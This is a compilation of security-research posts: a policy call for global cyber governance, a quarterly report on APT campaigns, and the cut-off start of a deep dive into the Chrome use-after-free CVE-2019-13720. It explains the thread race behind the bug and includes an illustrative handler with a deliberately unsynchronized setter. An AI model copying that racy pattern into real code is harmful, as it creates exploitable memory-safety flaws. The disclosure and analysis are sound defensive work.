However, states have not agreed yet about a binding treaty or about how existing international law applies to keep our digital world at peace. There are regular examples demonstrating the major negative effects of cyberattacks on [businesses](<https://www.hydro.com/en/media/on-the-agenda/cyber-attack/>), [nations](<https://www.politico.eu/article/ukraine-cyber-war-frontline-russia-malware-attacks/>) and [citizens](<https://www.kaspersky.com/resource-center/threats/ransomware-examples>) (or "civilians"), and there have been some initiatives to assess how [international law](<https://www.un.org/disarmament/update/the-application-of-international-law-in-cyberspace-state-of-play/>) [would apply](<https://ccdcoe.org/research/tallinn-manual/>) to cyber operations, to [globally](<https://www.interpol.int/Crimes/Cybercrime>) [combat cybercrime](<https://www.europol.europa.eu/about-europol/european-cybercrime-centre-ec3>), or to [establish norms](<https://www.un.org/disarmament/group-of-governmental-experts/>) of responsible [behavior in cyberspace](<https://www.un.org/disarmament/open-ended-working-group/>) for states. But these initiatives are not coordinated or global enough; they don't actually come with the expected regulations, cooperation and clear instruments to increase stability in cyberspace.

**Are we waiting for more dramatic effects** than those already caused by cyberattacks and cybercrime **to advance cybersecurity with strong governance and regulation instruments**? We believe that, on top of the intrinsic complexity of international cooperation, a **crucial lack of willpower from states is preventing substantial advancement** on cybersecurity.

### Double-dealing

We believe that lots of players are double-dealing in the digital age.
Cyberattacks appear to be highly profitable in the short-term, as they allow attackers and their sponsors to quickly and stealthily gather foreign and domestic intelligence, make money, disrupt or deter third parties, gain a strategic advantage over competitors or in warfare, circumvent regulations, or efficiently disseminate information. As a bonus, these malicious activities have a low entry cost, are subject to no monitoring, and for the most part go unattributed (thanks to, amongst other things, complex digital layers, bulletproof services and factors limiting interstate police cooperation). Therefore, perpetrators do not have to take responsibility for their actions and go unpunished – even when they do get exposed. Due to these convenient "cyber features", state or non-state actors might easily be tempted to publicly promote and even act in favor of a safer world, while making sure they can also benefit from offensive activities that remain undetected and go unpunished. Such activities also promote the public and private development of cyberweapons, mercenary services, criminal activities, and the monetization of vulnerabilities instead of responsible disclosure. All this, in turn, harms the efforts of cybersecurity and enables proliferation.

But that's not all when it comes to double-dealing: government bodies dedicated to cybersecurity and non-state actors can even play this dangerous game to some extent. Cybersecurity threat intelligence and data are of topmost interest to national defense and security management, as well as very valuable to the competitive cybersecurity business. It is a vital asset to the economy, and for detecting or deterring strategic threats. As a result, threat intelligence may not be shared and actioned as easily and broadly as it should, in a common determined path to cybersecurity, but might rather be guarded jealously for private interests.
Private companies such as Kaspersky, however, do their best to proactively [share intelligence](<https://securelist.com>) and [insights on investigations](<https://opentip.kaspersky.com/>) to the community for free.

### Existing regulations are not (global) enough

We also feel that achieving cybersecurity is not possible without a stronger sense of responsibility from all public and private actors that play a role in the development and operation of our global digital space. Governments have already gone some way to fostering this sense over the years by creating or strengthening regulations on personal data processing or protection for critical information systems. While this has been a significant advancement towards cybersecurity, it has unfortunately not been enough.

Most of the cyberattacks we face and analyze do not actually leverage sophisticated technical vulnerabilities or tools, because they don't need to. It is often way too easy to access the [devices and networks](<https://securelist.com/lazarus-on-the-hunt-for-big-game/97757/>) owned by a public or private organization because elementary cybersecurity measures are still not implemented, and because the organization's very own digital assets are not clearly identified or not controlled sufficiently. Every organization that processes digital data of personal significance, or develops or operates digital services, starting with those that benefit us the most, or contribute to our most vital needs, including governments, should be required to implement and demonstrate elementary cybersecurity frameworks. The associated regulations should be global, because cyberspace and digital assets are shared amongst all users around the world.
It may not be possible to [become invulnerable](<https://securelist.com/you-cant-be-invulnerable-but-you-can-be-well-protected/73160/>), but making cyberattacks more costly for the attackers while protecting our digital world a little more is doable.

On top of the lack of preventive and protective measures from many public and private organizations, another responsibility issue is blocking the road to cybersecurity. Cyberattacks cannot be carried out without leveraging publicly available commercial services, such as content hosting, development, infrastructure provision and mercenary services. First, it would seem obvious that any private organization that purposely engages in cyberattack operations or cyberweapons development should have its activities limited by regulations, and controlled by an impartial third party, in order to ensure that malicious activities are constrained by design, and that cyberweapons do not proliferate. Also, in order to maintain peace in the cyberworld, it is critical that any organization whose services are demonstrated to be leveraged to carry out cyberattacks is required to cooperate with cybersecurity organizations designated by an impartial third party, to contribute to cybersecurity investigations and demonstrate efforts to continuously prevent the malicious use of exposed services.

Digital services and information technologies that unintentionally support malicious cyber activities are – most of the time – developed to bring sound and useful outcomes. However, and for decades, [vulnerability disclosures](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-1999-0001>) and cyberattacks have demonstrated that some technologies or uses are flawed by design and can be exploited by malicious actors.
We can probably collectively accept that when the first information technologies were [developed](<https://hbr.org/1958/11/management-in-the-1980s>) and [deployed](<https://www.cs.princeton.edu/courses/archive/fall06/cos561/papers/cerf74.pdf>), it wasn't easy to anticipate malicious uses, which is why cybersecurity efforts only came afterwards. But it is no longer possible nor tolerable to develop, deploy and operate technologies and services that have a global use potential, while ignoring existing threats, and without making them secure by design. Yet, even more vulnerabilities and malicious uses affect relatively modern services and technologies, from [IoT](<https://securelist.com/on-the-iot-road/91833/>) and [artificial intelligence systems](<https://www.belfercenter.org/publication/AttackingAI>) to [cloud infrastructures](<https://media.defense.gov/2020/Jan/22/2002237484/-1/-1/0/CSI-MITIGATING-CLOUD-VULNERABILITIES_20200121.PDF>), [robotics](<https://securelist.com/robots-social-impact/94431/>) and [new mobile networks](<https://securelist.com/5g-security-for-smart-cities/95057/>). In order to anticipate and prevent malicious exploitation of modern technologies as much as it is reasonably possible, we believe that transparent vulnerability management and disclosure practices [need to be developed further](<https://front.un-arm.org/wp-content/uploads/2020/03/kaspersky-position-paper-on-oewg-first-pre-draft-report.pdf>) by both state and non-state actors; and that technologies or services that are used globally should be assessed by a global community of experts more often.

Last but not least, we also think that more threats could be better anticipated in the future if future generations are globally and systematically educated on information technologies and cybersecurity, whatever their origin or path.
This will contribute to a safer world.

## Our call and plans

It is rather unusual for cybersecurity researchers and experts to write on governance matters. We don't pretend that our hypotheses are the most suitable, or the most comprehensive. But we definitely feel concerned, and strongly believe that the points we have raised are obstructing a common path to cybersecurity. Furthermore, we are pleased to note that most of our hypotheses and beliefs are actually shared with many others, as demonstrated in the 2020 [Paris Call](<https://pariscall.international/>) consultation [key takeaways](<https://www.kaspersky.com/about/policy-blog/general-cybersecurity/supporting-paris-call>), or [the latest reports](<https://front.un-arm.org/wp-content/uploads/2020/05/200527-oewg-ict-revised-pre-draft.pdf>) from the UN's [OEWG](<https://www.un.org/disarmament/open-ended-working-group/>) on "developments in the field of information and telecommunications in the context of international security", to which [Kaspersky](<https://front.un-arm.org/wp-content/uploads/2020/03/kaspersky-position-paper-on-oewg-first-pre-draft-report.pdf>) [contributed](<https://front.un-arm.org/wp-content/uploads/2020/06/kaspersky-position-paper-on-oewg-second-pre-draft-report-11-june-2020.pdf>).

We feel it is now a good time to send a **call to all governments and international bodies** (and ultimately any citizen) **that aim for a safer world: we urge you to demonstrate more willpower, and a more determined approach to cybersecurity**, by tackling the exposed causes of failure. We ask you to cooperatively choose the long-term peace of our common digital assets, over short-term nationalistic or private interests. We do our part, and we want our expert efforts to be transformed and developed further. We hope for a safer world, and a long-standing peaceful common digital space.
We will never achieve this without determined leadership and a global change towards a better common behavior.

### A cooperative and global governing instrument

We need strong political and technological leaders to drive governments and international bodies towards a cooperative, determined and fast-paced road to cybersecurity. In order to continuously rationalize efforts, share insights and thoughts, enable regulation, control and take global measures, we need them to build a dedicated, strong, permanent and focused international instrument.

We believe that such an instrument could be hosted by the UN, should seek to tackle the causes of the failures that we exposed, and should help governments to enforce regulations and cooperatively take measures when they are needed.

In order to ensure a cooperative approach by design, to consider the whole spectrum of what is at stake, and to truly take the transnational nature of cyberspace into consideration, we believe that such an instrument should guarantee a continuous dialogue with representatives of governments, the private sector, civil society and the technical community. This would enable the creation of cooperative task forces that would provide broad cybersecurity expertise and assessments on various matters, including preventive and protective cybersecurity measures, vulnerability research, incident response, attribution, regulation, law enforcement, security and risk assessment of modern technologies, and cyber capacity building.
It would also ensure that most findings are shared across nations and among cybersecurity players.

This governing instrument should also be able to build norms and regulations, and a cooperative approach to control the attribution of cyberattacks and sanctions against non-compliant behavior or crime, risk analysis, capacity building, and education for cybersecurity.

### A binding treaty of responsible behavior in cyberspace

Nearly [two decades ago](<https://undocs.org/A/RES/58/32>), the UN started to task groups of government experts ([GGE](<https://www.un.org/disarmament/group-of-governmental-experts/>)) to anticipate international security developments in the field of IT, and to advance responsible state behavior in cyberspace. One of the most notable outcomes, despite GGE's debatable results and [limited reach](<https://www.ecfr.eu/article/commentary_time_to_fall_forward_on_cyber_governance>), is the definition of [13 principles](<https://undocs.org/A/RES/73/27>) that constitute the norms of responsible behavior in cyberspace. But after more than a decade, these principles are non-binding, apply to governments only, and have only been endorsed on a [voluntary basis](<https://undocs.org/A/70/174>). We believe this is not enough, and that it may reflect the lack of willpower and commitment from our governing leaders to cybersecurity.

We believe that the norms for responsible behavior in cyberspace should be further developed together with guidance on how these norms should be implemented, and should better include non-state actors such as the private sector, civil society and the technical community. After that they should become binding for the international community – if they remain voluntary, why should the bad guys care?

As far as private companies are concerned, the norm could set transparency and ethics baselines.
We must not fail to mention [Kaspersky's own Global Transparency Initiative](<https://www.kaspersky.com/about/transparency>), which we truly believe to be a good source of inspiration for setting a number of private sector norms. This includes (but is not limited to) independent reviews of processes, security controls and software code, relocation of data processing, as well as the ability for trusted partners, customers and government stakeholders to directly access and check software code or threat detection rules. A code of ethics or ethics principles, from [the "FIRST" international CSIRTs community](<https://www.first.org/global/sigs/ethics/>) or from [Kaspersky](<https://www.kaspersky.com/blog/vulnerability-disclosure-ethics/35581/>), that tackle the responsible disclosure of security vulnerabilities, could also be leveraged as inspiration for private company norms.

### Global regulations and shared means for cybersecurity

In order to tackle residual double-dealing issues and regulation needs that we exposed in our hypotheses, the global governing instrument or guidance should build and support further common regulations, on top of the previously mentioned norms of behavior. Such global regulations would ensure a consistent baseline of security requirements, to prevent proliferation of cyberweapons, prevent and firmly condemn cyberattacks, implement cybersecurity controls, foster responsibility and facilitate cooperation. How, where, and under which terms this governing instrument or guidance can be established should be a discussion for both state and non-state actors to ensure that we all fully recognize our responsibility to keep the digital space secure.

## Conclusion

We deal with cyberattacks of all kinds every day and monitor their context from various sources.
Over the years, we have seen more and more malicious activities from more and more actors, but global cybersecurity has reached a ceiling, and it appears that the potential for cyber-based conflicts is still growing. During the COVID-19 pandemic we [have once again observed](<https://front.un-arm.org/wp-content/uploads/2020/06/kaspersky-annex-on-cyber-threat-landscape-during-covid-19-pandemic-11-june-2020.pdf>) just how vital information technologies and digital assets are to democracy, the economy, the development of society, security and entertainment.

We believe that now is still a good time for world leaders, international and regional organizations, the private sector, the technical community and civil society to collaborate on achieving long-term peace in cyberspace rather than focusing on the short-term interests of individual countries or private organizations.

Published on Securelist, 2020-12-07: [Researchers call for a determined path to cybersecurity](<https://securelist.com/researchers-call-for-a-determined-path-to-cybersecurity/99708/>)

For more than three years, the Global Research and Analysis Team (GReAT) at Kaspersky has been publishing quarterly summaries of advanced persistent threat (APT) activity. The summaries are based on our threat intelligence research and provide a representative snapshot of what we have published and discussed in greater detail in our private APT reports.
They are designed to highlight the significant events and findings that we feel people should be aware of.

This is our latest installment, focusing on activities that we observed during Q3 2020.

Readers who would like to learn more about our intelligence reports or request more information on a specific report are encouraged to contact [intelreports@kaspersky.com](<mailto:intelreports@kaspersky.com>).

## The most remarkable findings

We have already partly documented the activities of DeathStalker, a unique threat group that seems to focus mainly on law firms and companies operating in the financial sector. The group's interest in gathering sensitive business information leads us to believe that DeathStalker is a group of mercenaries offering hacking-for-hire services, or acting as an information broker in financial circles. The activities of this threat actor first came to our attention through a PowerShell-based implant called Powersing. This quarter, we unraveled the threads of DeathStalker's LNK-based Powersing intrusion workflow. While there is nothing groundbreaking in the whole toolset, we believe defenders can gain a lot of value by understanding the underpinnings of a modern, albeit low-tech, infection chain used by a successful threat actor. DeathStalker continues to develop and use this implant, using tactics that have mostly been identical since 2018, while making greater efforts to evade detection. In August, our [public report of DeathStalker's activities](<https://securelist.com/deathstalker-mercenary-triumvirate/98177/>) summarized the three scripting language-based toolchains used by the group – Powersing, Janicab and Evilnum.

Following our initial private report on Evilnum, we detected a new batch of implants in late June 2020, showing interesting changes in the (so far) quite static modus operandi of DeathStalker.
For instance, the malware directly connects to a C2 server using an embedded IP address or domain name, as opposed to previous variants where it made use of at least two dead drop resolvers (DDRs) or web services, such as forums and code sharing platforms, to fetch the real C2 IP address or domain. Interestingly, for this campaign the attackers didn't limit themselves merely to sending spear-phishing emails but actively engaged victims through multiple emails, persuading them to open the decoy, to increase the chance of compromise. Furthermore, aside from using Python-based implants throughout the intrusion cycle, in both new and old variants, this was the first time that we had seen the actor dropping PE binaries as intermediate stages to load Evilnum, while using advanced techniques to evade and bypass security products.

We also found another intricate, low-tech implant that we attribute to DeathStalker with medium confidence. The delivery workflow uses a Microsoft Word document and drops a previously unknown PowerShell implant that relies on DNS over HTTPS (DoH) as a C2 channel. We dubbed this implant PowerPepper.

During a recent investigation of a targeted campaign, we found a UEFI firmware image containing rogue components that drop previously unknown malware to disk. Our analysis showed that the revealed firmware modules were based on a known bootkit named Vector-EDK, and the dropped malware is a downloader for further components. By pivoting on unique traits of the malware, we uncovered a range of similar samples from our telemetry that have been used against diplomatic targets since 2017 and have different infection vectors. While the business logic of most is identical, we could see that some had additional features or differed in implementation. Due to this, we infer that the bulk of samples originate from a bigger framework that we have dubbed [MosaicRegressor](<https://securelist.com/mosaicregressor/98849/>).
Code artefacts in some of the framework's components, and overlaps in C2 infrastructure used during the campaign, suggest that a Chinese-speaking actor is behind these attacks, possibly one that has connections to groups using the Winnti backdoor. The targets, diplomatic institutions and NGOs in Asia, Europe and Africa, all appear to be connected in some way to North Korea.

## Europe

Since publishing our initial report on WellMess (see our [_APT trends report Q2 2020_](<https://securelist.com/apt-trends-report-q2-2020/97937/>)), the UK National Cyber Security Centre (NCSC) has released a joint technical advisory, along with Canadian and US governments, on the most recent activity involving WellMess. Specifically, all three governments attribute the use of this malware targeting COVID-19 vaccine research to The Dukes (aka APT29 and Cozy Bear). The advisory also details two other pieces of malware, SOREFANG and WellMail, that were used during this activity. Given the direct public statement on attribution, new details provided in the advisory, as well as new information discovered since our initial investigation, we published our report to serve as a supplement to our previous reporting on this threat actor. While the publication of the NCSC advisory has increased general public awareness on the malware used in these recent attacks, the attribution statements made by all three governments provided no clear evidence for other researchers to pivot on for confirmation. For this reason, we are currently unable to modify our original statement; and we still assess that the WellMess activity has been conducted by a previously unknown threat actor. We will continue to monitor for new activity and adjust this statement in the future if new evidence is uncovered.

## Russian-speaking activity

In summer, we uncovered a previously unknown multimodule C++ toolset used in highly targeted industrial espionage attacks dating back to 2018.
So far, we have seen no similarities with known malicious activity regarding code, infrastructure or TTPs. To date, we consider this toolset and the actor behind it to be new. The malware authors named the toolset MT3, and based on this abbreviation we have named the toolset [MontysThree](<https://securelist.com/montysthree-industrial-espionage/98972/>). The malware is configured to search for specific document types, including those stored on removable media. It contains natural language artefacts of correct Russian and a configuration that seeks directories that exist only in Cyrillic versions of Windows, while presenting some false flag artefacts suggesting a Chinese-speaking origin. The malware uses legitimate cloud services such as Google, Microsoft and Dropbox for C2 communications.

## Chinese-speaking activity

Earlier this year, we discovered an active and previously unknown stealthy implant dubbed Moriya in the networks of regional inter-governmental organizations in Asia and Africa. This tool was used to control public facing servers in those organizations by establishing a covert channel with a C2 server and passing shell commands and their outputs to the C2. This capability is facilitated using a Windows kernel mode driver. Use of the tool is part of an ongoing campaign that we have named TunnelSnake. The rootkit was detected on the targeted machines in May, with activity dating back as early as November 2019, persisting in networks for several months following the initial infection. We found another tool showing significant code overlaps with this rootkit, suggesting that the developers have been active since at least 2018. Since neither the rootkit nor the other lateral movement tools that accompanied it during the campaign relied on hard-coded C2 servers, we could gain only partial visibility into the attacker's infrastructure.
That said, the bulk of detected tools, apart from Moriya, consisted of both proprietary and well-known pieces of malware that were previously used by Chinese-speaking threat actors, giving a clue to the attacker's origin.

PlugX continues to be effectively and heavily used across Southeast and East Asia, and also Africa, with some minimal use in Europe. The PlugX codebase has been in use by multiple Chinese-speaking APT groups, including HoneyMyte, Cycldek and LuckyMouse. Government agencies, NGOs and IT service organizations seem to be consistent targets. While the new USB spreading capability is opportunistically pushing the malware throughout networks, compromised MSSPs/IT service organizations appear to be a potential vector of targeted delivery, with CobaltStrike installer packages pushed to multiple systems for initial PlugX installation. Based on our visibility, the majority of activity in the last quarter appears to be in Mongolia, Vietnam and Myanmar. The number of systems in these countries dealing with PlugX in 2020 is at the very least in the thousands.

We discovered an ongoing campaign, dating back to May, utilizing a new version of the Okrum backdoor, attributed to Ke3chang. This updated version of Okrum uses an Authenticode-signed Windows Defender binary using a unique side-loading technique. The attackers used steganography to conceal the main payload in the Defender executable while keeping its digital signature valid, reducing the chance of detection. We haven't previously seen this method being used in the wild for malicious purposes. We have observed one affected victim, a telecoms company located in Europe.

On September 16, the [US Department of Justice released three indictments associated with hackers allegedly connected with APT41](<https://www.justice.gov/opa/pr/seven-international-cyber-defendants-including-apt41-actors-charged-connection-computer>) and other intrusion sets tracked as Barium, Winnti, Wicked Panda and Wicked Spider.
In addition, two Malaysian nationals were also arrested on September 14, in Sitiawan (Malaysia), for "conspiring to profit from computer intrusions targeting the video game industry", following cooperation between the US DoJ and the Malaysian government, including the Attorney General's Chambers of Malaysia and the Royal Malaysia Police. The first indictment alleges that the defendants set up an elite "white hat" network security company, called Chengdu 404 Network Technology Co, Ltd. (aka Chengdu Si Lingsi Network Technology Co., Ltd.), and under its guise, engaged in computer intrusions targeting hundreds of companies around the world. According to the indictment, they "carried out their hacking using specialized malware, such as malware that cyber-security experts named 'PlugX/Fast', 'Winnti/Pasteboy', 'Shadowpad', 'Barlaiy/Poison Plug' and 'Crosswalk/ProxIP'". The indictments contain several indirect IoCs, which allowed us to connect these intrusions to Operation ShadowPad and Operation ShadowHammer, two massive supply-chain attacks discovered and investigated by Kaspersky in recent years.

## Middle East

In June, we observed new activity by the MuddyWater APT group, involving use of a new set of tools that constitute a multistage framework for loading malware modules. Some components of the framework leverage code to communicate with C2s identical to code we observed in the MoriAgent malware earlier this year. For this reason, we decided to dub the new framework MementoMori. The purpose of the new framework is to facilitate execution of further in-memory PowerShell or DLL modules. We detected high-profile victims based in Turkey, Egypt and Azerbaijan.

## Southeast Asia and Korean Peninsula

In May, we found new samples belonging to the Dtrack family. The first sample, named Valefor, is an updated version of the Dtrack RAT containing a new feature enabling the attacker to execute more types of payload.
The second sample is a keylogger called Camio which is an updated version of its keylogger. This new version updates the logged information and its storage mechanism. We observed signs indicating that these malware programs were tailored for specific victims. At the time of our research our telemetry revealed victims located in Japan.

We have been tracking LODEINFO, fileless malware used in targeted attacks since last December. During this time, we observed several versions as the authors were developing the malware. In May, we detected version v0.3.6 targeting diplomatic organizations located in Japan. Shortly after that, we detected v0.3.8 as well. Our investigation revealed how the attackers operate during the lateral movement stage: after obtaining the desired data, the attackers wipe their traces. Our private report included a technical analysis of the LODEINFO malware and the attack sequence in the victim's network, to disclose the actor's tactics and methods.

While tracking Transparent Tribe activity, we discovered an interesting tool used by this APT threat actor: the server component used to manage CrimsonRAT bots. We found different versions of this software, allowing us to look at the malware from the perspective of the attackers. It shows that the main purpose of this tool is file stealing, given its functionalities for exploring the remote file system and collecting files using specific filters. Transparent Tribe (aka PROJECTM and MYTHIC LEOPARD) is a very prolific APT group that has increased its activities in recent months. We reported [the launch of a new wide-ranging campaign that uses the CrimsonRAT tool](<https://securelist.com/transparent-tribe-part-1/98127/>) where we were able to set up and analyze the server component and saw the use of the USBWorm component for the first time; we also found [an Android implant used to target military personnel in India](<https://securelist.com/transparent-tribe-part-2/98233/>).
This discovery also confirms much of the information already discovered during previous investigations, and it also confirms that CrimsonRAT is still under active development.

In April, we discovered a new malware strain that we named CRAT, based on the build path and internal file name. The malware was spread using a weaponized Hangul document as well as a Trojanized application and strategic web compromise. Since its discovery, the full-featured backdoor has quickly evolved, diversifying into several components. A downloader delivers CRAT to profile victims, followed by next-stage orchestrator malware named SecondCrat: this orchestrator loads various plugins for espionage, including keylogging, screen capturing and clipboard stealing. During our investigation, we found several weak connections with ScarCruft and Lazarus: we discovered that several debugging messages inside the malware have similar patterns to ScarCruft malware, as well as some code patterns and the naming of the Lazarus C2 infrastructure.

In June, we observed a new set of malicious Android downloaders which, according to our telemetry, have been actively used in the wild since at least December 2019, and have been used in a campaign targeting victims almost exclusively in Pakistan. Its authors used the Kotlin programming language and the Firebase messaging system for the downloader, which mimics Chat Lite, Kashmir News Service and other legitimate regional Android applications. A report by the National Telecom & Information Technology Security Board (NTISB) from January describes malware sharing the same C2s and spoofing the same legitimate apps. According to this publication, targets were Pakistani military bodies, and the attackers used WhatsApp messages, SMS, emails and social media as the initial infection vectors. Our own telemetry shows that this malware also spreads through Telegram messenger.
The analysis of the initial set of downloaders allowed us to find an additional set of Trojans that we believe are strongly related, as they use the package name mentioned in the downloaders and focus on the same targets. These new samples have strong code similarity with artefacts previously attributed to Origami Elephant.

In mid-July, we observed a Southeast Asian government organization targeted by an unknown threat actor with a malicious ZIP package containing a multilayered malicious RAR executable package. In one of the incidents, the package was themed around COVID-19 containment. We believe that the same organization was probably also the target of a government web server watering hole, compromised in early July and serving a highly similar malicious LNK. Much like other campaigns against particular countries that we have seen in the past, these adversaries are taking a long-term, multipronged approach to compromising target systems without utilizing zero-day exploits. Notably, another group (probably OceanLotus) used a similar Telegram delivery technique with its malware implants against the same government targets within a month or so of the COVID-19-themed malicious LNK, in addition to its use of Cobalt Strike.

In May 2020, Kaspersky technologies prevented an attack using a malicious script for Internet Explorer against a South Korean company. Closer analysis revealed that the attack used a previously unknown full chain that consisted of two zero-day exploits: a Remote Code Execution exploit for Internet Explorer and an Elevation of Privilege exploit for Windows.
Unlike a previous full chain that we discovered, used in Operation WizardOpium (you can read more [here](<https://securelist.com/chrome-0-day-exploit-cve-2019-13720-used-in-operation-wizardopium/94866/>) and [here](<https://securelist.com/windows-0-day-exploit-cve-2019-1458-used-in-operation-wizardopium/95432/>)), the new full chain targeted the latest builds of Windows 10, and our tests demonstrated reliable exploitation of Internet Explorer 11 and Windows 10 build 18363 x64. On June 8, we reported our discoveries to Microsoft, who confirmed the vulnerabilities. At the time of our report, the security team at Microsoft had already prepared a patch for vulnerability CVE-2020-0986, which was used in the zero-day Elevation of Privilege exploit; but before our discovery, the exploitability of this vulnerability had been considered less likely. The patch for CVE-2020-0986 was released on June 9. Microsoft assigned CVE-2020-1380 to a use-after-free vulnerability in JScript, and the patch for this was released on August 11. We are calling this and related attacks [Operation PowerFall](<https://securelist.com/ie-and-windows-zero-day-operation-powerfall/97976/>). Currently, we are unable to establish a definitive link with any known threat actor, but due to similarities with previously discovered exploits we believe that DarkHotel may be behind this attack.

On July 22, we came across a suspicious archive file that was uploaded to VirusTotal from an Italian source. The file seemed to be a triage consisting of malicious scripts, access logs, malicious document files and several screenshots related to suspicious file detections from security solutions. After looking into these malicious document files, we identified that they are related to a Lazarus group campaign that we reported in June. This campaign, dubbed DeathNote, targeted the automobile industry and individuals in the academic field using lure documents containing aerospace and defense-related job descriptions.
We are confident that these documents are related to a recently reported attack on an Israeli defense company. We have uncovered webshell scripts, C2 server scripts and malicious documents, identified several victims connected to the compromised C2 server, and uncovered the method used to access the C2 server.

We have observed an ongoing Sidewinder campaign that started in February, using five different malware types. The group made changes to its final payloads and continues to target government, diplomatic and military entities using current themes, such as COVID-19, in its spear-phishing efforts. While the infection mechanism remains the same as before, including the group's exploit of choice (CVE-2017-1182) and use of the DotNetToJScript tool to deploy the final payloads, we found that the actor also used ZIP archives containing a Microsoft compiled HTML Help file to download the last-stage payload. In addition to the existing .NET-based implant, which we call SystemApp, the threat actor added JS Orchestrator, the Rover/Scout backdoor and modified versions of AsyncRAT and warzoneRAT to its arsenal.

## Other interesting discoveries

Attribution is difficult at the best of times, and sometimes it's not possible at all. While investigating an ongoing campaign, we discovered a new Android implant undergoing development, with no clear link to any previously known Android malware. The malware is able to monitor and steal call logs, SMS, audio, video and non-media files, as well as identifying information about the infected device. It also implements an interesting feature to collect information on network routes and topology obtained using the "traceroute" command as well as using local ARP caches. During this investigation we uncovered a cluster of similar Android infostealer implants, with one example being obfuscated.
We also found older Android malware that more closely resembles a backdoor, with traces of it in the wild dating back to August 2019.

In April, Cisco Talos described the activities of an unknown actor targeting Azerbaijan's government and energy sector using new malware called PoetRAT. In collaboration with Kaspersky ICS CERT, we identified supplementary samples of associated malware and documents with broader targeting of multiple universities, government and industrial organizations as well as entities in the energy sector in Azerbaijan. The campaign started in early November 2019, and the attackers switched off the infrastructure immediately following publication of the Cisco Talos report. We observed a small overlap in victimology with Turla, but since there is no technically sound proof of a relation between them, and we haven't been able to attribute this new set of activity to any other previously known actor, we named it Obsidian Gargoyle.

## Final thoughts

The TTPs of some threat actors remain fairly consistent over time (such as using hot topics, such as COVID-19, to entice users to download and execute malicious attachments sent in spear-phishing emails), while other groups reinvent themselves, developing new toolsets and widening their scope of activities, for example, to include new platforms. And while some threat actors develop [very sophisticated tools](<https://securelist.com/mosaicregressor/98849/>), for example, the MosaicRegressor UEFI implant, others [have great success](<https://securelist.com/deathstalker-mercenary-triumvirate/98177/>) with basic TTPs.
Our regular quarterly reviews are intended to highlight the key developments of APT groups.

Here are the main trends that we've seen in Q3 2020:

* Geo-politics continues to drive the development of many APT campaigns, as seen in recent months in the activities of Transparent Tribe, Sidewinder, Origami Elephant and MosaicRegressor, and in the 'naming and shaming' of various threat actors by the NCSC and the US Department of Justice.
* Organizations in the financial sector also continue to attract attention: the activities of the mercenary group DeathStalker are a recent example.
* We continue to observe the use of mobile implants in APT attacks, with recent examples including Transparent Tribe and Origami Elephant.
* While APT threat actors remain active across the globe, recent hotspots of activity have been Southeast Asia, the Middle East and various regions affected by the activities of Chinese-speaking APT groups.
* Unsurprisingly, we continue to see COVID-19-themed attacks – this quarter they included WellMess and Sidewinder.
* Among the most interesting APT campaigns this quarter were DeathStalker and MosaicRegressor: the former underlining the fact that APT groups can achieve their aims without developing highly sophisticated tools; the latter representing the leading edge in malware development.

As always, we would note that our reports are the product of our visibility into the threat landscape.
However, it should be borne in mind that, while we strive to continually improve, there is always the possibility that other sophisticated attacks may fly under our radar.

Source: "APT trends report Q3 2020", Securelist, published 2020-11-03, https://securelist.com/apt-trends-report-q3-2020/99204/

Back in October 2019 we detected a classic watering-hole attack on a North Korea-related news site that exploited a chain of Google Chrome and Microsoft Windows zero-days. While we've already published blog posts briefly describing this operation (available [here](<https://securelist.com/chrome-0-day-exploit-cve-2019-13720-used-in-operation-wizardopium/94866/>) and [here](<https://securelist.com/windows-0-day-exploit-cve-2019-1458-used-in-operation-wizardopium/95432/>)), in this blog post we'd like to take a deep technical dive into the exploits and vulnerabilities used in this attack.

## Google Chrome remote code execution exploit

In the [original blog post](<https://securelist.com/chrome-0-day-exploit-cve-2019-13720-used-in-operation-wizardopium/94866/>) we described the exploit loader responsible for initial validation of the target and execution of the next-stage JavaScript code containing the full browser exploit. The exploit is huge because, besides code, it contains byte arrays with shellcode, a Portable Executable (PE) file and a WebAssembly (WASM) module used in the later stages of exploitation. The exploit abused a vulnerability in the WebAudio OfflineAudioContext interface and was targeting two release builds of Google Chrome: 76.0.3809.87 and 77.0.3865.75.
However, the vulnerability was introduced long before that, and much earlier releases with a WebAudio component are also vulnerable. At the time of our discovery the current version of Google Chrome was 78, and while this version was also affected, the exploit did not support it and had a number of checks to ensure that it would only be executed on affected versions to prevent crashes. After our report, the vulnerability was assigned CVE-2019-13720 and was fixed in version 78.0.3904.87 with the following [commit](<https://chromium.googlesource.com/chromium/src.git/+/6a2e670a243b815cf043f8da4d26ecb9a64d307b>). A use-after-free (UAF) vulnerability, it could be triggered due to a race condition between the Render and Audio threads:

```diff
 if (!buffer) {
+	BaseAudioContext::GraphAutoLocker context_locker(Context());
+	MutexLocker locker(process_lock_);
 	reverb_.reset();
 	shared_buffer_ = nullptr;
 	return;
```

As you can see, when the audio buffer is set to null in ConvolverNode and an active buffer already exists within the Reverb object, the function SetBuffer() can destroy the reverb_ and shared_buffer_ objects.

```cpp
class MODULES_EXPORT ConvolverHandler final : public AudioHandler {
...
std::unique_ptr<Reverb> reverb_;
std::unique_ptr<SharedAudioBuffer> shared_buffer_;
...
```

These objects might still be in use by the Render thread because there is no proper synchronization between the two threads in the code. A patch added two missing locks (graph lock and process lock) for when the buffer is nullified.

The exploit code was obfuscated, but we were able to fully reverse engineer it and reveal all the small details. By looking at the code, we can see the author of the exploit has excellent knowledge of the internals of specific Google Chrome components, especially the [PartitionAlloc](<https://github.com/scrapy/base-chromium/blob/master/allocator/partition_allocator/PartitionAlloc.md>) memory allocator.
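The two added locks are the entire fix, so the pattern is worth seeing on its own. The following is an added example written for this page, not Chromium code: a toy handler in the shape of ConvolverHandler, with the pre-fix setter beside the locked one and a two-thread stress loop that exercises the locked path. `Buffer`, `ConvolverLikeHandler` and the sample sums it checks are constructed for the illustration, and a single mutex stands in for Chromium's graph lock and process lock.

```cpp
// Added example (not Chromium code): the synchronization pattern behind the
// CVE-2019-13720 fix, reduced to a toy handler shared by two threads. The
// names Buffer, ConvolverLikeHandler and process_lock_ echo the page's
// description but are invented for this illustration.
#include <atomic>
#include <cstddef>
#include <memory>
#include <mutex>
#include <thread>
#include <vector>

struct Buffer {
    std::vector<float> samples;
    explicit Buffer(std::size_t n) : samples(n, 1.0f) {}
};

class ConvolverLikeHandler {
 public:
    // Pre-fix shape of the setter: the owning pointer is reset with no lock,
    // so a concurrent Process() may still be reading the old Buffer while it
    // is destroyed. Kept only for comparison; the stress test never calls it.
    void SetBufferUnsynchronized(std::unique_ptr<Buffer> b) {
        buffer_ = std::move(b);
    }

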